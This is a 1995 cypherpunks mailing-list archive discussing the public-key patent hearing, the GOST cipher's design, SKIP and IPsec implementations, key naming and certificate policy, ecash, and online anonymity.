frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rschlafly@attmail.com (Roger  Schlafly)
Date: Wed, 29 Nov 1995 17:07:13 +0800
To: cypherpunks@toad.com
Subject: PKP patent hearing
Message-ID: <rschlafly3330854090>
MIME-Version: 1.0
Content-Type: text/plain



Hearing on the validity of the public key patents
=================================================

On Wed., Dec. 6, 1995, 10:00 am, San Jose Federal Bldg, there will
be a hearing on the validity of the Diffie-Hellman, Hellman-Merkle,
RSA, and Schnorr patents.

There are also some annoying procedural technicalities that are
also scheduled to be heard, so we may not get to the patents
right away.  (antitrust standing, sufficiency of pleadings,
admissibility of evidence, etc.)

Details:
Schlafly v. Public Key Partners & RSA Data Security
Case C-94-20512 SW PVT
Hon. Spencer Williams
At the San Jose federal building, 280 S First St.
Ask the US Marshals where Williams' courtroom is while you go thru
the airport-style security.
Court Clerk: 408/535-5364

The Federal Bldg is in downtown San Jose, between 101, 880, and 280.
I will take 280 to SJ, go north on 87, right on the first exit, and
park in the first convenient lot or garage.  There is some street
parking, but the SJ meter maids are very efficient.  If you come
from the north, you may want to take 87 or the Almaden Expwy.  (I get
those mixed up.)

The judge is used to lawyers wearing suits, so try to wear something
that won't appear disrespectful.

Roger Schlafly

phone: 408-476-3550
CompuServe: 76646,323
US Mail: PO Box 1680, Soquel, CA 95073 USA
Internet: rschlafly@attmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Thu, 30 Nov 1995 07:49:53 +0800
To: cypherpunks@toad.com
Subject: Re: GOST for sale
Message-ID: <01HY74DKD11A9IFJI3@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Fri, 24 Nov 1995 03:43:25 +0100 (MET)
>From: Mats Bergstrom <asgaard@sos.sll.se>
>Subject: GOST for sale

>According to a short article in a Swedish newspaper (DN)
>with the title 'Spy Code of KGB can make computers safe',
>JETICO INC., located in Finland (Tammerfors), introduced
>a new crypto system on the world market last week. It's
>based on GOST, the Russian federal standard algorithm.
>This product, called BestCrypt, is implemented at least
>partly in hardware. Alledgedly it uses 'GOST 28147-89',
>whatever that stands for.

Hmmm.

>GOST is probably very secure - a huge keyspace (256 bits) and
>KGB would not have left a trapdoor for NSA to take advantage
>of, would they?

If this is the cipher I've seen, it's not overwhelmingly impressive,
though it may be OK.  I haven't ever made any serious attempt to
attack it, and I don't know anyone else who has.  Anyone have a
reference?

Basically, GOST is a balanced Feistel network (like DES), but its
F-function is much simpler.  Basically,
F(X,K) = Rotate_Left(S(X+K),11),
where S(t) denotes parallel application of eight 4:4 S-boxes.

Depending on the implementation, these S-boxes' contents could be
key-dependent and pseudorandom, or fixed.  Unfortunately small
random S-boxes are likely to have some weaknesses W.R.T.
differential cryptanalysis.  This can be true even when the S-boxes
are secret and key-derived--see Biham and Birkyov's paper in
Auscrypt '94 on a DES variant with variable S-boxes, for a quick
discussion of this.  And the security of this scheme is very much
going to depend upon the S-boxes used.  If the S-boxes are generated
at (pseudo)random from the key, I'd expect there to be some pretty
nasty weak key conditions that could occasionally come up.

On the other hand, GOST is defined with 32 rounds, so it may be hard
to find any useful differential or linear characteristics, even for
relatively bad S-box choices, that have high enough probability to
get through 29-31 rounds.  And it has a 256-bit key, so even if
someone determines some attack which recovers 160 bits of the key,
there are still 96 bits of key left to provide security.

The GOST key schedule is really simple, though it avoids the most
obvious kind of related key attack.  I wouldn't be surprised to see
some interesting related key attacks be possible.  This is
interesting because there is also a hash function based on GOST--I'd
be pretty reluctant to use this without a lot of analysis.

>The newspaper article ends:
>
>'The Finnish entrepreneurs asseverate that their
>Russian colleagues have never had anything to do
>with the KGB.'

I may be mistaken, but wasn't there some other internal organization
in the USSR that did cryptography?

>Mats

Note:  Please respond via e-mail as well as or instead of posting,
as I get CP-LITE instead of the whole list.

   --John Kelsey, jmkelsey@delphi.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLv0kkHx57Ag8goBAQFH3AP+JR1sEQCH0ANmNSDFhzpCZb4jn4uqq23v
PjZfFOrYc9SrD1xn+3azqfHFpiHIubfWzZ8u1aNEf4erAErbQLPAUOLPv17zhn//
6UEVKX4GhPqoLfou+wO38rF2DwWdeCjuQm2GgxuFpw5b0D4M3V1mv5ocLOoOMq2N
twdfxiMtO6Y=
=BOER
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 29 Nov 1995 15:46:58 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: GOST for sale
In-Reply-To: <Pine.HPP.3.91.951124033807.19699B-100000@cor.sos.sll.se>
Message-ID: <199511290728.CAA01862@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Mats writes:
> JETICO INC., located in Finland (Tammerfors), introduced
> a new crypto system on the world market last week. It's 
> based on GOST, the Russian federal standard algorithm.
> This product, called BestCrypt, is implemented at least
> partly in hardware. Alledgedly it uses 'GOST 28147-89',
> whatever that stands for.

A DejaNews search for "BestCrypt" turned up an announcement by
Sergey Frolov in comp.security.misc
on November 14th. According to him, it implements GOST, single DES, and IDEA.
They have DOS and Windows versions. He says [big sic for this quote]:

	All algorithm available simultaneosly - you may change
	algorithm for your data easy - it's look like to change the password...

	I have non-commercial demo version of the product (370 Kb arjed 
	distributive) and I can send it to people who will be interested in it.

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 29 Nov 1995 10:47:12 +0800
To: cypherpunks@toad.com
Subject: Re: PGP hooks for Pegasus Mail?
Message-ID: <199511290230.DAA13064@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


----- wake-up rant ON -----

On 28 Nov 95 at 12:16, Lynne L. Harrison wrote:

> At 09:52 AM 11/28/95 +0000, you wrote:
> >Anyone done anything regarding PGP hooks into Pegasus Mail? 
> >I'm running it at home now (SLIPped into my Linux box), and 
> >I'd like to find a way to integrate PGP into Pegasus Mail.
> >
> >Thanks in advance for any replies...
> 
> Ed -
> 
>   I haven't heard of anything re: "PGP hooks into Pegasus 
> Mail".  At one time, Eudora and ViaCrypt were discussing it 
> but, from what I heard, those discussions fizzled out.

>   The easiest way to *integrate* is to use a front end program.

I find it bizarre that what little is going on in real integration of PGP for e-mail users is not mentioned on cp, perhaps unknown, certainly not of interest to those who should be interested.

What is going on is going on with respect to Pegasus, and what mention of it there is is not on cp but on the Pegasus Mail list.

Apparently cypherpunks *don't* write code, and PMail people *do*.

Do a million registered users and an e-mail program with hooks already originating outside the U.S. penetrate anyone's consciousness?

----- wake-up rant OFF -----





 ------------ http://www.phoenix.net/~tjunker ------------
| Your freedom is on the auction block.  What do you bid? |
 ---------------------------------------------------------
Unofficial Wang VS Information Center




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@hks.net (Leslie Todd Masco)
Date: Wed, 29 Nov 1995 16:59:16 +0800
To: cypherpunks@toad.com
Subject: Re: Untitled
Message-ID: <199511290849.DAA08036@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199511282257.RAA00774@jekyll.piermont.com>,
Perry E. Metzger <perry@piermont.com> wrote:
>
>Anonymous writes:
>> Is this list archived so that I can try to look stuff up before asking 
>> stupid questions?
>
>Yes. Check www.hks.net (I think -- maybe its hks.com).

http://www.hks.net/cpunks/index.html

It's (still!) in flux, though and hasn't quite gotten those useful
search functions yet.  I'd flame the maintainer, but...
- -- 
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMLwesCoZzwIn1bdtAQHStAF+I0PlsickMkTsVFcbLPMMRPsvap+yD2gR
etQjdnAivni4EzlDH+++XfxX+VpkmX8o
=DhdR
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Wed, 29 Nov 1995 22:57:16 +0800
To: cypherpunks@toad.com
Subject: Microsoft weak encryption
Message-ID: <199511291447.GAA19250@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter Gutmann has an interesting article in sci.crypt, demonstrating how
weak Microsoft's encryption is with basic access control in Windows for
Workgroups (I'm assuming Win95 uses the same algorithm).  Essentially, he
shows how a 32-bit key is created to be passed to RC4 for encrypting .PWL
files.  I think a t-shirt is definitely in order for this.

Anyone up for writing some bruting code?

Joel





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 1 Dec 1995 00:46:17 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: The future will be easy to use
Message-ID: <199511301622.IAA08684@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain



>Jon Lasser writes:
>> However, if you have optional linking of ID and name, shippers will only 
>> ship to keys with such attributes. Because just ID and address, it could 
>> be a "hit and run" type attack shipped to a safe maildrop.

At 03:19 AM 11/30/95 -0500, Futplex wrote:
>People who steal credit cards prefer to order goods to be delivered somewhere
>they can grab them.

Presumably all of us seek a ecash and echeque system somewhat better
than a human readable sixteen decimal digit number:

Indeed, what I had in mind was 1024 binary bit number -- we should be
working to a world in which a self generated secret PGP key performs the
functions that a credit card number does today.





 (Often this is just the front of the rightful owner's
>home, while Holly the Homeowner is off at work.) But that's just another
>reason to cut down unauthorized credit card charges, not a reason to restrict
>what a rightful cardholder can do with the card. I _want_ to be able to have
>stuff delivered to arbitrary locations, and I _don't_ want to give that up
>just to make it tough on thieves.
>
>James Donald writes:
>> This argument makes no sense at all:  I am going to attack my
>> enemies by paying people to send books, computers, and stuff
>> to them?
>
>Ordering hardcore porno videos to be sent to, say, somewhere in Tennessee
>might work pretty well in our sadly repressed society.
>
>-Futplex <futplex@pseudonym.com>
>
>
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 1 Dec 1995 00:51:07 +0800
To: Carl Ellison <rsalz@osf.org
Subject: Re: The future will be easy to use
Message-ID: <199511301622.IAA08718@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


From: Rich Salz <rsalz@osf.org>
> > There is, of course, no way to interpret the semantics of this
electronically.

At 10:11 AM 11/30/95 EST, Carl Ellison wrote:
> Of course not.  In the end, a human needs to make the decision based on
> ASCII text.

For those ascii texts that belong to a small and commonly used set,
we can set our computers to automatically follow certain policies,
and to bring to our attention "special case" texts that lie outside
this set.



 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 30 Nov 1995 00:58:53 +0800
To: cypherpunks@toad.com
Subject: ecash casino
Message-ID: <199511291640.IAA28114@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Any enterprising cypherpunks in gambling-friendly
jurisdictions interested? I figure it would make ecash take off.. and
you'd get rich.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Wed, 29 Nov 1995 22:07:43 +0800
To: cypherpunks@toad.com
Subject: No Privacy Right in US ?
Message-ID: <Pine.BSD.3.91.951129085026.5117L-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
Edupage, 28 November 1995, reports: 
 
             ONLINE ANONYMITY IS ALL RELATIVE 

America Online has revealed the real name of a subscriber 
who called herself "Jenny TRR" to a Caribbean resort owner 
and dive instructor who claim they were defamed in remarks 
she posted on an AOL bulletin board. 
 
AOL gave the subscriber a chance to object to the action, but 
says she didn't attempt to fight the subpoena.  AOL's assis- 
tant general counsel says the service doesn't disclose infor- 
mation about electronic mail, which is protected by the Elec- 
tronic Communications Privacy Act, 
 
         unless it [ electronic mail ] is part of 
                a criminal investigation. 
 
The item cites: Wall Street Journal 24 Nov 95 B1. 
 
 
There's two types of criminal investigations: those of crimes 
and those that are crimes. 
 
 
Cordially, 
 
Jim 
 
 
 
NOTE: 
 
     To subscribe to Edupage send a message to: 
 
                    listproc@educom.unc.edu 
 
     and in the body of the message type: 
 
                  subscribe edupage Joe Louis 
 
(assuming that your name is Joe Louis; if it's not, substitute 
your own name). 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 29 Nov 1995 22:09:51 +0800
To: frantz@netcom.com
Subject: Re: The future will be easy to use
Message-ID: <9511291354.AA16998@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>There is more to this problem than how it is that I trust the key.  There
>is also what I trust it for.  ...
>It is hard to see how to record the information about how much I trust the
>receipent's systems security.

Bingo!  This is one of the hard parts of certificate authorities; just
what are you attesting to?  The American Bar Association has a big document
for public review that addresses what this might mean; there are a couple
of RFC's that specify CA policies (one from COST in Sweden, I think), and
RSA and/or Verisign will give you their policy in hardcopy.

In x.509v3 certificates, there is an extensible field where the key-signer
can put arbitrary data.  The intent is apparently that you put the ISO
object-ID (you know, those funny 1.3.2.11.... numbers) of the policy
document.

There is, of course, no way to interpret the semantics of this electronically.
It will be interesting to see how various companies address this issue,
for example as they start to support arbitrary CA's in browsers or servers
while doing commerce over the web.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jps@monad.semcor.com (Jack P. Starrantino)
Date: Wed, 29 Nov 1995 22:48:49 +0800
To: cypherpunks@toad.com
Subject: Re: The future will be easy to use
In-Reply-To: <199511280435.UAA08732@blob.best.net>
Message-ID: <9511291431.AA14541@monad.semcor.com>
MIME-Version: 1.0
Content-Type: text/plain


James A. Donald writes

> Specs, anyone?  > > I suggest a few requirements:  > > Store the
keys, and information about the keys in a *real* database > ...

Is this worth the complexity/cost? I'd have thought that the amount of
data involved would be small enough that index hashing would be
overkill, and I can't think of any operations that would require a full
up db engine.

Am I missing something?

jps
-- 
Jack P. Starrantino     (215) 674-0200 (voice)
SEMCOR, Inc.            (215) 443-0474 (fax)
65 West Street Road     jps@semcor.com
Suite C-100
Warminster, PA 18974




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 29 Nov 1995 17:44:04 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: The future will be easy to use
In-Reply-To: <199511281801.NAA00386@jekyll.piermont.com>
Message-ID: <Pine.BSD.3.91.951129093109.12710F-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



   what about the Sun release announced today? --it is fully functional
with DES and 3xDES, DH negotiation, etc. and is coded for either sun 4.1.3
or gcc compilers?  Check out http://skip.incog.com.  source to the SKIP
key management and IP layer encryption package for SunOs 4.x. 

On Tue, 28 Nov 1995, Perry E. Metzger wrote:

> 
> Jonathan Zamick writes:
> > This discussion was based on a group of people getting together to create
> > a new easy to use package for handling keys and such. The government is
> > going to try to take a dominant stance, and mandate elements of it.
> 
> So we can ignore tem. Big deal. They have no laws with which to
> enforce their desires.
> 
> > However, it is possible, even in an antagonistic relationship, to develop
> > positive feedback.
> 
> Who cares? An hour spent talking to an idiot from Washington is better
> spent writing good code unless there is a law pending in congress, in
> which case you are probably better off paying someone who knows what
> they are doing to do the talking for you.
> 
> > Returning to the original topic though, do we want to get a smaller list
> > together to spec out some ideas for the project that was discussed? A
> > simple, transparent, tool which would allow people to use strong encryption
> > without having to think about it?
> 
> You mean, like IPSEC/Photuris? I'll be running IPSEC (but sadly not
> Photuris, although I'll be trying to port Aggelos Keromytis' version
> at some point) on my laptop at the IETF meeting in Dallas (provided
> that I can buy a laptop in time.)
> 
> There are three things we are currently missing in the architecture,
> IMHO.
> 
> 1) We need a certificate system to replace X.509 and that plays nicely
>    with distributed databases.
> 2) We need to implement the Eastlake/Kaufman method for embedding
>    certificates in the DNS or something similar.
> 3) We need a good entity naming model.
> 
> Given all those being implemented, sometime soon I can see people
> telnetting or ftping hither and thither without ever noticing or
> caring that their sessions are completely encrypted.
> 
> We also have the following need:
> 
> 4) A good MIME mailer (that looks like NeXT Mail or something like it)
>    which has hooks for something MOSSlike that uses the same
>    certificate infrastructure described in 1-3 above.
> 5) SHTTP capable browsers that also use 1-3 listed above.
> 
> .pm
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Wed, 29 Nov 1995 23:11:43 +0800
To: cypherpunks@toad.com
Subject: Re: Encrypted Email
Message-ID: <Pine.BSD.3.91.951129094944.5117M-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain



 
Connie, 
 
 
On 11 27 95 you asked 
 
    Can anybody briefly summarize for me some options for 
    encrypting email that are secure? I know about PGP but 
    I need something for (my environment) with an easy to 
    use interface (PC-Windows) - for use by people who 
    really aren't very computer literate. 
 
 
The following item from 11 27 95 Computerworld 58 may be 
helpful: 
 
 CommTouch Software, Inc. in San Mateo, Calif., announced 
 a secure Internet E-mail package called Pronto Secure. 
 
 It allows connected and disconnected users to send and 
 encrypt Internet mail.  It supports many Internet security 
 protocols, such as Power One-Time Pad, Pretty Good Privacy, 
 Privacy Enhanced Mail, Secure Multipurpose Internet Mail 
 Extensions (S / MIME) and MIME Object Security Services. 
 
 Pronto Secure, which will ship in March, will require users 
 to replace their existing Internet mail systems....  Comm- 
 Touch plans to ship by mid-1996 a security module that is 
 Messaging Application Programming Interface-compliant and 
 works with a user's existing mail [system]. 
 
 
At p 66 of the same issue, there's a listing of "Recent in- 
formation security product announcements."  CommTouch is 
listed there; its Internet address is 
 
                     micheleb@ipri.com 
 
and a single copy of Pronto Secure is US $299 list. 
 
ipri.com = InterActive Public Relations, Inc in 'Frisco. 
 
 
Cordially, 
 
Jim 
 
  
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 29 Nov 1995 23:42:20 +0800
To: cypherpunks@toad.com
Subject: WAY_lad
Message-ID: <199511291529.KAA22826@pipe9.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-29-95. FiTi:

   "Information highway needs rules of the road, says report."

      Pointing out the possibility of technical
      incompatibilities and trade friction if companies are
      treated differently in different markets, the report
      outlines the case for a "global regulator" within the
      structure of the new World Trade Organisation. It points
      out that issues such as intellectual property rights,
      encryption and government control on cross-ownership
      have global rather than national aspects. "Encryption,
      for example, raises tricky and emotive issues connected
      with organised crime and national security and cannot be
      treated simply as a business problem."

   No revolution for software [Editorial]

      Today's software market is the way it is not because of
      some evil conspiracy in Seattle, Microsoft's home town,
      but because it meets most consumers' interests most of
      the time. The power to set standards follows from that
      success. Changing technology widens the range of
      possible market structures, but does not affect
      customers' underlying needs and preferences. In the
      battle between the technologically possible and the
      economically attractive, economics always wins.


   WAY_lad  (7 kb)


FiTi on-line at <www.ft.com> for waylaying top article.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 29 Nov 1995 23:44:58 +0800
To: cypherpunks@toad.com
Subject: NOH_ide
Message-ID: <199511291530.KAA23283@pipe9.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-29-95. Washrag:

   "Postal Service Awards Contracts to Develop Computer
   Kiosks."

      The Postal Service predicted "more than 10,000" kiosks
      could be installed in post offices, libraries and
      shopping malls "within the next few years." The Postal
      Service is the lead government agency on the project,
      one of several administration initiatives designed to
      provide the public with computer access to government
      information.

   "CIA, Pentagon Back NIMA 'Concept' Combining Spy Satellite
   Photo Units."

      The Pentagon and the CIA announced an agreement
      yesterday endorsing the "concept" of consolidating eight
      defense and intelligence agencies -- those responsible
      for managing spy satellite photos and related tasks --
      into a new National Imagery and Mapping Agency.

   NOH_ide  (10 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 29 Nov 1995 23:49:18 +0800
To: cypherpunks@toad.com
Subject: Re: SKIP Source Release is out!
In-Reply-To: <9511290122.AA26147@monster.incog.com>
Message-ID: <199511291534.KAA02780@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Tom Markson writes:
> Check out http://skip.incog.com.  We've released the source to the SKIP
> key management and IP layer encryption package for SunOs 4.x.

SKIP is a non-standard being pushed by Sun.

Admittedly, it is available for FTP. However, thats just because I
don't have an FTP site for the NRL IPsec + IPv6 stuff.

Anyone who'd like to help me put the sources to the NRL IPsec + IPv6
implementation up for FTP is invited to get in touch. It will runs on
4.4BSD machines (i.e. BSDI, NetBSD, FreeBSD, etc) and should be
pretty portable to other similar Berkeley based machines.

It won't "run out of the box" on NetBSD as it stands -- I should have
it nicely packaged up to do that before the end of the week.


Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Thu, 30 Nov 1995 10:34:37 +0800
To: Jonathan Zamick <JonathanZ@consensus.com>
Subject: Re: The future will be easy to use
In-Reply-To: <v02120d02ace0fcab0df8@[157.22.240.13]>
Message-ID: <Pine.SOL.3.91.951129104350.18458D-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 28 Nov 1995, Jonathan Zamick wrote:
> Returning to the original topic though, do we want to get a smaller list
> together to spec out some ideas for the project that was discussed? A
> simple, transparent, tool which would allow people to use strong encryption
> without having to think about it?

It should be worth noting that I hope to put out the next version of
SSLeay in less that a week (I hope, depending on how many nights I don't
sleep :-) and it should include a 'demo' CA application. It will probably
only use simple text indexes and directorys for storage but I intend it to
be able to generate CRL and process certificate requests.  The only
question is do I put in support to ouput the certificate using a
netscape/verisign compatable format :-).  If nothing else, this should be
a good starting point for adding a nice GUI front end and a real database
backend.  The application will be mostly a front-end to the SSLeay library
so if I finish most of my documentation by then, others should be able to
write a real CA application. 

eric
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Thu, 30 Nov 1995 00:22:11 +0800
To: jamesd@echeque.com
Subject: Re: The future will be easy to use
In-Reply-To: <199511290659.WAA19886@blob.best.net>
Message-ID: <9511291555.AA25090@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Mon, 27 Nov 1995 22:57:25 -0800
>From: "James A. Donald" <jamesd@echeque.com>
>
>At 01:03 PM 11/28/95 EST, Carl Ellison wrote:
>>That's true.  What the user would have to see is some icon (or, for
>>text-bound folks, a temporary unique string) until the user chooses and
>>assigns the appropriate alias.  That icon would have no meaning by itself.
>>It would acquire a meaning by being associated with some message or set of
>>messages:
>
>Better method:  Creator of the key names it:  Usually after himself or
>his role:  The recipients key database detects and resolves cases 
>where two different keys have identical names in accordance with
>certification rules.

That's today's method, more or less.  It doesn't address my needs.  The
name you pick for your key may or may not mean anything to me.  It might be
pronounceable, giving it some advantage over a radix-64 string, but it
might also be non-unique, making it worthless as an identifier.

What means something to me is whatever name (or symbol) I assign to the
person behind the key in question.  That's the one in my mind and therefore
the only one of interest to me.  You, however, don't know what's in my
mind.  You don't even know my preferred symbol set.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLyCVlQXJENzYr45AQEqEQP+O23i/6bcPX60i249150mv39WdoO0sL1w
pUtiZRs2PLACYTMA+DVP28upD4HRrk3/5Vd76EojPm5R8P/DWP190CccRo0t4xZ4
fM1kqEanvw1unV3Kd37ZjhD7tme5oN/v0ipjB2ETsrnowJnZ8HYhiF+WClK5ShhD
gEAg71NQux8=
=RyHR
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 30 Nov 1995 00:11:09 +0800
To: attila <attila@primenet.com>
Subject: Re: The future will be easy to use
In-Reply-To: <Pine.BSD.3.91.951129093109.12710F-100000@usr1.primenet.com>
Message-ID: <199511291555.KAA02851@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



attila writes:
> 
>    what about the Sun release announced today? --it is fully functional
> with DES and 3xDES, DH negotiation, etc. and is coded for either sun 4.1.3
> or gcc compilers?  Check out http://skip.incog.com.  source to the SKIP
> key management and IP layer encryption package for SunOs 4.x. 

Ah, yes. The non-standard from Sun.

It doesn't do D-H negotiation, by the way. It uses something I'd call
inferior. Read the flames in ipsec and ipsec-dev for details.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Thu, 30 Nov 1995 00:08:09 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: key for Alice as promised (not)
Message-ID: <199511291558.KAA15623@homeport.org>
MIME-Version: 1.0
Content-Type: text


> > >Can you imagine??  I'm simply not willing to fool myself into thinking 
> > >that I ahve security by posting a key and using PGP.
> > 
> > Unless you can post some proof that PGP is insecure, stop insisting it is.
> 
> PGP is really not the issue.  The issue is more my security and the
> environment that I use PGP in.  I don't have a trusted machine to run PGP
> on.  Anyone who wants to can come up to machine and copy my secret keyring
> or they can even watch me typing my password in. 

	Threat, please??  Do people often stand over your shoulder as
you type?  Enter your office, point guns at you, and take a backup of
your entire computer?  Have you considered putting the secret keyring
on a floppy and locking it in your desk/safe when you're not actually
in the office? (Or home..)

> So, I don't fool myself, and I don't use PGP, except for things like
> exchanging a one-time pad with someone when I've already sent the message
> out across another delivery mechanism, like on a floppy delivered my
> courier. 

	I don't follow.  You're claiming that PGP is good enough to
transfer OTPads, but not good enough to sign pseudononymous messages?

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Thu, 30 Nov 1995 00:17:48 +0800
To: joelm@eskimo.com (Joel McNamara)
Subject: Re: Microsoft weak encryption
In-Reply-To: <199511291447.GAA19250@mail.eskimo.com>
Message-ID: <199511291559.KAA15633@homeport.org>
MIME-Version: 1.0
Content-Type: text


Joel McNamara wrote:

| Peter Gutmann has an interesting article in sci.crypt, demonstrating how
| weak Microsoft's encryption is with basic access control in Windows for
| Workgroups (I'm assuming Win95 uses the same algorithm).  Essentially, he
| shows how a 32-bit key is created to be passed to RC4 for encrypting .PWL
| files.  I think a t-shirt is definitely in order for this.

	While Peter did a nice job of showing how Windows stores
passwords, my understanding is that those passwords are decrypted by
Windows, and sent over the net in the clear.  Seems much easier to
snarf them there..

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: smithmi@dev.prodigy.com (Michael Smith)
Date: Thu, 30 Nov 1995 00:27:40 +0800
To: cypherpunks@toad.com
Subject: Re: SKIP Source Release is out!
Message-ID: <199511291606.LAA30779@tinman.dev.prodigy.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry Metzger writes:

>Anyone who'd like to help me put the sources to the NRL IPsec + IPv6
>implementation up for FTP is invited to get in touch. It will runs on
>4.4BSD machines (i.e. BSDI, NetBSD, FreeBSD, etc) and should be
>pretty portable to other similar Berkeley based machines.

What licensing requirements exist for people who might want to 
use this code in their products? In particular, does one need to 
obtain any licensing from RSA or Cylink? 

--Michael Smith
  smithmi@dev.prodigy.com

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 30 Nov 1995 00:34:52 +0800
To: smithmi@dev.prodigy.com (Michael Smith)
Subject: Re: SKIP Source Release is out!
In-Reply-To: <199511291606.LAA30779@tinman.dev.prodigy.com>
Message-ID: <199511291612.LAA02926@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Michael Smith writes:
> Perry Metzger writes:
> 
> >Anyone who'd like to help me put the sources to the NRL IPsec + IPv6
> >implementation up for FTP is invited to get in touch. It will runs on
